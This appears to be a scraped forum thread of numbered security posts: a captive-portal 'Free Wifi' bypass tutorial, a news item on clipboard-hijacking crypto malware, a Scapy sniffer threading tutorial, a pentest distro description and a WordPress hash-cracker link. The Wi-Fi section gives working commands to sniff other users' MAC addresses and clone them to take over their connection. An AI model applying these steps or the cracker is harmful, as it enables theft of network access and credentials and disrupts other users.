     Devices running iOS are not likely to qualify as good mining hardware anyway. Bitcoin cryptocurrency mining has long been dominated by custom ASIC chips. Some other cryptocurrencies are designed to be ASIC-resistant, but even these are predominantly mined on high-end graphics cards with ample processing power and memory. An iPhone or iPad doesn't offer very much raw computing power per dollar, so it probably wouldn't make sense for someone to buy an iPhone or iPad to use as a mining device.

     Apple guidelines also now state that cryptocurrency apps "may not offer currency for completing tasks, such as downloading other apps, encouraging other users to download, posting to social networks."

     Apple's new policy takes effect at a time of growing concern over scammy behavior in the cryptocurrency world. Google and Facebook both banned cryptocurrency ads from their ad networks earlier this year. And the Securities and Exchange Commission has become increasingly aggressive about shutting down initial coin offerings that are fraudulent or otherwise break the law.

     Via arstechnica.com
  20. Free Wifi

This short tutorial describes a few methods for gaining access to the Internet, a basic human right, from public wireless networks. This tutorial has been tested on Mac and a Raspberry Pi. It should generally work on Linux, and hasn't been tested on Windows.

Preparation

Make sure you do this step before you are stuck without Internet access:

Install Python pip. On Linux, install the Python Developer package, a dependency for the netifaces package.

Ubuntu:

    $ sudo apt-get install python-dev

Fedora:

    $ sudo dnf install python-devel

Note: For CentOS, substitute dnf with yum.

Make a copy of this repository and install dependencies for the script:

    $ git clone https://github.com/kylemcdonald/FreeWifi
    $ cd FreeWifi && sudo pip install -r requirements.txt

How to get additional time

If you had free internet access but your time has run out, the first thing to try is to open an incognito/private window. Here are instructions for a few browsers: Chrome (mobile and desktop), Safari for iOS, Safari for Mac, Microsoft Edge.

An incognito/private window will temporarily clear any cookies that may have been used for tracking how much time you spent online, making you look like a "new user" and allowing you to log into the wireless portal again.

Unfortunately, most systems track MAC addresses instead of cookies. A MAC address is a unique identifier assigned to every network interface. This means you need to get a new MAC address to get additional time. Fortunately, MAC addresses can be changed in software, without swapping the hardware. The spoof-mac command line utility makes this easy; enter sudo spoof-mac randomize Wi-Fi. If the command fails to run, try entering spoof-mac list --wifi to check what the name of your wireless device is first, and use that manually. After randomizing your MAC, try logging into the wireless portal again. When you're done using the Internet, run sudo spoof-mac reset Wi-Fi to reset your MAC address.

Note that MAC address spoofing may be interpreted as an illegal activity depending on why you do it. In some cases it is certainly not illegal: recent mobile operating systems like iOS 8+ and Android 6+ automatically randomize their MAC address when searching for wireless networks to avoid being tracked. But when Aaron Swartz liberated JSTOR, MAC address spoofing was claimed as a signal of intention to commit a crime.

How to get free access

If the network is open, but you can't get access for some reason, you can also try spoofing the MAC address of a device that is already using the network. To the router, your device and the other device will look like one device. This can cause some minor problems if they interrupt each other, but for light browsing it usually works out fine.

To find the MAC addresses of other devices using the network, first you need to connect to the network. You don't need to have Internet access, just a connection. First, on Mac OS run the command sudo chmod o+r /dev/bpf* once to make sure you can sniff wireless data (you need to do this again if you restart your computer). Then run the command python wifi-users.py. You should see a progress bar immediately:

    Available interfaces: en0
    Interface: en0
    SSID: nonoinflight
    Available gateways: en0
    Gateway IP: 10.0.1.1
    Gateway MAC: 00:e0:4b:22:96:d9
    100%|██████████████████████████| 1000/1000 [00:46<00:00, 21.46it/s]
    Total of 5 user(s):
    27:35:96:a8:66:7f 6359 bytes
    36:fe:83:9c:35:eb 9605 bytes
    65:01:3c:cc:20:e8 17306 bytes
    8c:6f:11:2c:f0:ee 20515 bytes
    0a:4f:b2:b8:e8:56 71541 bytes

If there isn't much traffic on the network, it might take longer. If it's taking too long, type CTRL-C to cancel the sniffing and print whatever results are available.

Finally, we want to spoof one of these MAC addresses. For example, in this case we would enter sudo spoof-mac set 0a:4f:b2:b8:e8:56 Wi-Fi to try spoofing the address with the most traffic (they probably have a connection).

After running that command, try to access the Internet. If you don't have a connection, try the next MAC in the list. If your Internet connection drops out while using this MAC address, try disconnecting and reconnecting to the wireless network. Note that the original user of the MAC you copied may experience these same connection drop-outs if you are both actively using the network.

How it works

wifi-users.py uses tcpdump to collect wireless packets. Then we look through these packets for any hints of the MAC address (BSSID) of our wireless network. Finally, we look for data packets that mention a user's MAC as well as the network BSSID (or the network gateway), and take note of that MAC using some amount of data. Then we sort the users' MACs by the total amount of data and print them out.

Instead of sniffing wireless traffic, in some situations you can also use the command arp -a to get a list of MAC addresses of devices on the wireless network. Then you can either use spoof-mac to copy the address, or use ifconfig directly on Linux and OSX. For the specifics of using ifconfig, look at the implementations of set_interface_mac inside SpoofMac's interfaces.py.

This repository is dedicated to Lauren McCarthy, who has taught me the most about the art of getting a good deal.

Source
  21. @sergiu4995 https://github.com/kylemcdonald/FaceTracker edit: you can try Face Substitution by Kyle McDonald. References: https://www.auduno.com/clmtrackr/examples/facesubstitution.html https://github.com/kylemcdonald http://kylemcdonald.net/
  22. The IT security researchers at Qihoo 360 Total Security have discovered a new malware aimed at stealing cryptocurrencies, including Bitcoin and Ethereum, from the computer systems of unsuspecting users. Dubbed ClipboardWalletHijacker by researchers, the malware is targeting Windows-based devices and is currently installed on over 300,000 devices.

As indicated by its name, the malware monitors clipboard activity to identify what kind of cryptocurrencies the victim has stored in their wallet. In case the malware finds Bitcoin and Ethereum addresses, it replaces them with the ones used by the cybercriminals behind the campaign.

So far ClipboardWalletHijacker has stolen over 5 Bitcoin, while its last activity was detected on June 12th, 2018, indicating that the malware is still active and stealing funds.

Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims' cryptocurrencies. "We strongly recommend users to enable antivirus software while installing new applications", said the company in their blog post.

ClipboardWalletHijacker's ability to replace wallet addresses by monitoring clipboard activity is not new; previously, the CryptoShuffler Trojan was found following the same method to steal mainstream cryptocurrencies including Dash, Monero, Ethereum, Bitcoin, and Zcash. In March this year, researchers spotted the ComboJack malware, which actively steals cryptocurrency by modifying victims' addresses. Moreover, the Evrial and Coinbitclip trojans were also caught monitoring the clipboard activities of their victims to steal funds by replacing their wallet addresses.

If you are investing in cryptocurrency, make sure your system is secure and your funds are properly protected. Additionally, cryptocurrency users are advised to avoid using online wallets to store their funds and to move to hardware wallets. Here is a list of 5 secure Bitcoin wallets which you can trust.

In January this year, researchers warned Internet proxy users to watch out for Tor Proxy, since its owners were found replacing Bitcoin payment addresses to divert payments from ransomware victims to their own wallets.

Via hackread.com
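The defensive counterpart to the clipboard-swapping trick described in the post above is to check that the address you paste is the one you copied. The following is an added example, not code from the article or from any of the products it mentions: it validates legacy Bitcoin addresses with the real Base58Check algorithm (double SHA-256 checksum), recognises Ethereum addresses by shape only, and keeps a record of the last address the user copied so that a clipboard later holding a different valid address of the same kind is flagged. The ClipboardSwapDetector class and its method names are my own; the sample payload passed to b58check_encode is constructed, and the one real address used is the well-known Bitcoin genesis block address.

```python
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
ETH_ADDRESS = re.compile(r"0x[0-9a-fA-F]{40}")  # shape check only, no EIP-55 checksum


def b58encode(raw: bytes) -> str:
    """Base58 encoding; each leading zero byte becomes a leading '1'."""
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    pad = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * pad + out


def b58decode(text: str) -> bytes:
    """Inverse of b58encode; raises ValueError on a non-base58 character."""
    n = 0
    for ch in text:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError("not base58: %r" % ch)
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def b58check_encode(version: bytes, payload: bytes) -> str:
    """Build a Base58Check string (used here only to construct sample addresses)."""
    data = version + payload
    checksum = hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]
    return b58encode(data + checksum)


def is_bitcoin_address(text: str) -> bool:
    """True for a mainnet P2PKH (0x00) or P2SH (0x05) address whose checksum verifies."""
    try:
        raw = b58decode(text)
    except ValueError:
        return False
    if len(raw) != 25 or raw[0] not in (0x00, 0x05):
        return False
    checksum = hashlib.sha256(hashlib.sha256(raw[:-4]).digest()).digest()[:4]
    return checksum == raw[-4:]


def address_kind(text: str):
    """'bitcoin', 'ethereum' or None for the given clipboard content."""
    text = text.strip()
    if is_bitcoin_address(text):
        return "bitcoin"
    if ETH_ADDRESS.fullmatch(text):
        return "ethereum"
    return None


class ClipboardSwapDetector:
    """Remembers the address the user copied and flags a clipboard that later
    holds a different valid address of the same kind without a new user copy.
    (Hypothetical helper; wire user_copied/observe to your real clipboard hooks.)"""

    def __init__(self):
        self.copied = None

    def user_copied(self, text: str):
        self.copied = text.strip()

    def observe(self, clipboard_now: str):
        """Return an alert dict if the clipboard no longer matches what was copied."""
        if self.copied is None:
            return None
        now = clipboard_now.strip()
        kind = address_kind(self.copied)
        if kind and now != self.copied and address_kind(now) == kind:
            return {"kind": kind, "copied": self.copied, "now": now}
        return None


if __name__ == "__main__":
    genesis = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
    swapped = b58check_encode(b"\x00", bytes(range(1, 21)))  # constructed sample
    detector = ClipboardSwapDetector()
    detector.user_copied(genesis)
    print("unchanged:", detector.observe(genesis))
    print("swapped:  ", detector.observe(swapped))
```

The detector deliberately ignores a clipboard that changes to a non-address or to an address of another kind, because that is what a user copying something else looks like; only a same-kind substitution with no intervening copy is the pattern the post describes.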
  23. Scapy is an incredible tool when it comes to playing with the network. As it is written on its official website, Scapy can replace a majority of network tools such as nmap, hping and tcpdump. One of the features offered by Scapy is to sniff the network packets passing through a computer's NIC. Below is a small example:

    from scapy.all import *

    interface = "eth0"

    def print_packet(packet):
        ip_layer = packet.getlayer(IP)
        print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

    print("[*] Start sniffing...")
    sniff(iface=interface, filter="ip", prn=print_packet)
    print("[*] Stop sniffing")

This little sniffer displays the source and the destination of all packets having an IP layer:

    $ sudo python3 sniff_main_thread.py
    [*] Start sniffing...
    [!] New Packet: 10.137.2.30 -> 10.137.2.1
    [!] New Packet: 10.137.2.30 -> 10.137.2.1
    [!] New Packet: 10.137.2.1 -> 10.137.2.30
    [!] New Packet: 10.137.2.1 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    ^C[*] Stop sniffing

It will continue to sniff network packets until it receives a keyboard interruption (CTRL+C). Now, let's look at a new example:

    from scapy.all import *
    from threading import Thread
    from time import sleep

    class Sniffer(Thread):
        def __init__(self, interface="eth0"):
            super().__init__()
            self.interface = interface

        def run(self):
            sniff(iface=self.interface, filter="ip", prn=self.print_packet)

        def print_packet(self, packet):
            ip_layer = packet.getlayer(IP)
            print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

    sniffer = Sniffer()
    print("[*] Start sniffing...")
    sniffer.start()
    try:
        while True:
            sleep(100)
    except KeyboardInterrupt:
        print("[*] Stop sniffing")
        sniffer.join()

This piece of code does exactly the same thing as the previous one, except that this time the sniff function is executed inside a dedicated thread. Everything works well with this new version except when it comes to stopping the sniffer:

    $ sudo python3 sniff_thread_issue.py
    [*] Start sniffing...
    [!] New Packet: 10.137.2.30 -> 10.137.2.1
    [!] New Packet: 10.137.2.30 -> 10.137.2.1
    [!] New Packet: 10.137.2.1 -> 10.137.2.30
    [!] New Packet: 10.137.2.1 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    ^C[*] Stop sniffing
    ^CTraceback (most recent call last):
      File "sniff_thread_issue.py", line 25, in <module>
        sleep(100)
    KeyboardInterrupt

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "sniff_thread_issue.py", line 28, in <module>
        sniffer.join()
      File "/usr/lib/python3.5/threading.py", line 1054, in join
        self._wait_for_tstate_lock()
      File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock
        elif lock.acquire(block, timeout):
    KeyboardInterrupt
    ^CException ignored in: <module 'threading' from '/usr/lib/python3.5/threading.py'>
    Traceback (most recent call last):
      File "/usr/lib/python3.5/threading.py", line 1288, in _shutdown
        t.join()
      File "/usr/lib/python3.5/threading.py", line 1054, in join
        self._wait_for_tstate_lock()
      File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock
        elif lock.acquire(block, timeout):
    KeyboardInterrupt

When CTRL+C is pressed, a SIGTERM signal is sent to the process executing the Python script, triggering its exit routine. However, as said in the official documentation about signals, only the main thread receives signals:

As a result, when CTRL+C is pressed, only the main thread raises a KeyboardInterrupt exception. The sniffing thread will continue its infinite sniffing loop, blocking at the same time the call of sniffer.join(). So, how can the sniffing thread be stopped if not by signals?

Let's have a look at this next example:

    from scapy.all import *
    from threading import Thread, Event
    from time import sleep

    class Sniffer(Thread):
        def __init__(self, interface="eth0"):
            super().__init__()
            self.interface = interface
            self.stop_sniffer = Event()

        def run(self):
            sniff(iface=self.interface, filter="ip", prn=self.print_packet,
                  stop_filter=self.should_stop_sniffer)

        def join(self, timeout=None):
            self.stop_sniffer.set()
            super().join(timeout)

        def should_stop_sniffer(self, packet):
            return self.stop_sniffer.is_set()

        def print_packet(self, packet):
            ip_layer = packet.getlayer(IP)
            print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

    sniffer = Sniffer()
    print("[*] Start sniffing...")
    sniffer.start()
    try:
        while True:
            sleep(100)
    except KeyboardInterrupt:
        print("[*] Stop sniffing")
        sniffer.join()

As you may have noticed, we are now using the stop_filter parameter in the sniff function call. This parameter expects to receive a function which will be called after each new packet to evaluate whether the sniffer should continue its job or not. An Event object named stop_sniffer is used for that purpose. It is set to true when the join method is called to stop the thread. Is this the end of the story? Not really...

    $ sudo python3 sniff_thread_issue_2.py
    [*] Start sniffing...
    ^C[*] Stop sniffing
    [!] New Packet: 10.137.2.30 -> 10.137.2.1

One side effect remains. Because the should_stop_sniffer method is called only once after each new packet, if it returns false, the sniffer will continue its job, going back to its infinite sniffing loop. This is why the sniffer stopped one packet after the keyboard interruption. A solution would be to force the sniffing thread to stop.

As explained in the official documentation about threading, it is possible to flag a thread as a daemon thread for that purpose:

However, even if this solution would work, the thread won't release the resources it might hold: the sniff function uses a socket which is released just before exiting, after the sniffing loop:

    try:
        while sniff_sockets:
            # Sniffing loop
    except KeyboardInterrupt:
        pass
    if opened_socket is None:
        for s in sniff_sockets:
            s.close()
    return plist.PacketList(lst, "Sniffed")

Therefore, the solution I suggest is to open the socket outside the sniff function and to give it to this last one as a parameter. Consequently, it would be possible to force-stop the sniffing thread while closing its socket properly:

    from scapy.all import *
    from threading import Thread, Event
    from time import sleep

    class Sniffer(Thread):
        def __init__(self, interface="eth0"):
            super().__init__()
            self.daemon = True
            self.socket = None
            self.interface = interface
            self.stop_sniffer = Event()

        def run(self):
            self.socket = conf.L2listen(
                type=ETH_P_ALL,
                iface=self.interface,
                filter="ip"
            )
            sniff(
                opened_socket=self.socket,
                prn=self.print_packet,
                stop_filter=self.should_stop_sniffer
            )

        def join(self, timeout=None):
            self.stop_sniffer.set()
            super().join(timeout)

        def should_stop_sniffer(self, packet):
            return self.stop_sniffer.is_set()

        def print_packet(self, packet):
            ip_layer = packet.getlayer(IP)
            print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

    sniffer = Sniffer()
    print("[*] Start sniffing...")
    sniffer.start()
    try:
        while True:
            sleep(100)
    except KeyboardInterrupt:
        print("[*] Stop sniffing")
        sniffer.join(2.0)
        if sniffer.is_alive():
            sniffer.socket.close()

Et voilà! The sniffing thread now waits for 2 seconds after having received a keyboard interrupt, giving the sniff function time to terminate its job by itself, after which the sniffing thread will be force-stopped and its socket properly closed from the main thread.

Source
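The shutdown pattern the post arrives at (daemon thread, a stop Event that the loop checks once per packet, a join with a timeout, then closing the externally owned socket from the main thread) is easier to reason about when you can watch both outcomes without a live interface or root. The block below is an added example, not the blog's or Scapy's code: FakeSniffSocket is a constructed stand-in for the object conf.L2listen() returns, whose recv() blocks until a packet is injected or the socket is closed, and the Sniffer class repeats the post's design on top of it. run_scenario replays the two cases the post describes: a quiet network, where the stop request is never noticed by stop_filter and the socket has to be closed from outside, and a busy network, where the next packet lets the cooperative stop fire one packet late.

```python
import threading
import time
from queue import Empty, Queue


class FakeSniffSocket:
    """Constructed stand-in for the socket conf.L2listen() returns.

    recv() blocks until a packet is injected or close() is called; once closed
    it raises OSError, which is what a thread blocked in a real recv() sees
    when another thread closes the socket from under it.
    """

    def __init__(self):
        self._packets = Queue()
        self._closed = threading.Event()

    def inject(self, packet):
        self._packets.put(packet)

    def recv(self):
        while not self._closed.is_set():
            try:
                return self._packets.get(timeout=0.05)
            except Empty:
                continue  # quiet network: keep blocking, like a real recv()
        raise OSError("socket closed")

    def close(self):
        self._closed.set()

    @property
    def closed(self):
        return self._closed.is_set()


class Sniffer(threading.Thread):
    """Same shape as the post's final Sniffer: daemon thread, externally owned
    socket, stop_filter evaluated once per packet."""

    def __init__(self, sock):
        super().__init__(daemon=True)
        self.socket = sock
        self.stop_sniffer = threading.Event()
        self.seen = []

    def run(self):
        try:
            while True:
                packet = self.socket.recv()      # the sniffing loop
                self.seen.append(packet)
                if self.should_stop_sniffer(packet):
                    break                        # cooperative stop, one packet late
        except OSError:
            pass                                 # forced stop: socket closed by main thread

    def should_stop_sniffer(self, packet):
        return self.stop_sniffer.is_set()

    def join(self, timeout=None):
        self.stop_sniffer.set()
        super().join(timeout)


def shutdown(sniffer, grace=0.5):
    """Post's stop sequence: join with a timeout, then force the thread out by
    closing its socket. Returns True when the forced path was needed."""
    sniffer.join(grace)
    forced = sniffer.is_alive()
    if forced:
        sniffer.socket.close()
        sniffer.join(1.0)
    if not sniffer.socket.closed:
        sniffer.socket.close()  # sniff() never closes a socket it was handed
    return forced


def _wait_until(condition, timeout=2.0):
    deadline = time.monotonic() + timeout
    while not condition():
        if time.monotonic() > deadline:
            raise TimeoutError("sniffer did not consume the injected packets")
        time.sleep(0.01)


def run_scenario(packets, trailing_packet=None):
    """Drive one sniffer over constructed packets. trailing_packet, if given,
    arrives after the stop request and is what lets stop_filter fire."""
    sock = FakeSniffSocket()
    sniffer = Sniffer(sock)
    sniffer.start()
    for packet in packets:
        sock.inject(packet)
    _wait_until(lambda: len(sniffer.seen) == len(packets))
    sniffer.stop_sniffer.set()           # the first thing join() does
    if trailing_packet is not None:
        sock.inject(trailing_packet)
    forced = shutdown(sniffer)
    return {"seen": list(sniffer.seen), "forced": forced,
            "closed": sock.closed, "alive": sniffer.is_alive()}


if __name__ == "__main__":
    print("quiet network:", run_scenario(["p1", "p2", "p3"]))
    print("busy network: ", run_scenario(["p1", "p2"], trailing_packet="p3"))
```

Two details worth keeping when porting this back to Scapy: the socket must be closed in both paths (sniff does not close an opened_socket it was given, so the cooperative exit leaks it otherwise), and the join timeout is the only thing bounding shutdown on an idle interface, so pick it to match how long you are willing to wait for a packet that may never come.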
  24. Dracos Linux (www.dracos-linux.org) is a Linux operating system from Indonesia, open source, built based on Linux From Scratch under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos Linux is armed with hundreds of pentest, forensics and reverse engineering tools. It does not use GUI-based tools and only has software using the CLI (command line interface) to perform its operations. Dracos is now already up to version 2.0, with the code name "Leak".

Screenshot Teaser

The targets of development:

Education: Dracos Linux is purposed as an educational system, especially to recognize the Linux operating system, and we respect ethical hacking.

Build from source: it has always been built from code instead of an installer; this will stimulate users in Indonesia to stay creative and to build the spirit of open source.

Repository: even though proportionally based on code, Dracos Linux still intends to construct the repository to build up the processes, like Venomizer.

Heavy Control: we need to recognize this operating system as very difficult, because Dracos is built from source code, thus forcing us to compile when installing a package or software, which of course will raise the possibility of system failure and other system vulnerabilities.

Always from terminal: none of the tools installed inside the OS use a GUI. CLI will always be considered, particularly openbox, to ease the users in need of multiple terminals when applying penetration testing.

Penetration Tools List

Link: http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing

Information Gathering
Vulnerability Assessment
Web Attack
Exploitation Testing
Privilege Escalation
Password Attack
Social Engineering
Man In The Middle Attack
Stress Testing
Wireless Attack
Maintaining Access
Forensics Tools
Reverse Engineering
Malware Analysis
Covering Track

Download: https://dracos-linux.org/downloads.php

Source
  25. wpCrack v1.0 - WordPress hash cracker

Installation:

    git clone https://github.com/MrSqar-Ye/wpCrack.git

Video

Contact: Twitter: @MrSqar, or send to my email.

Source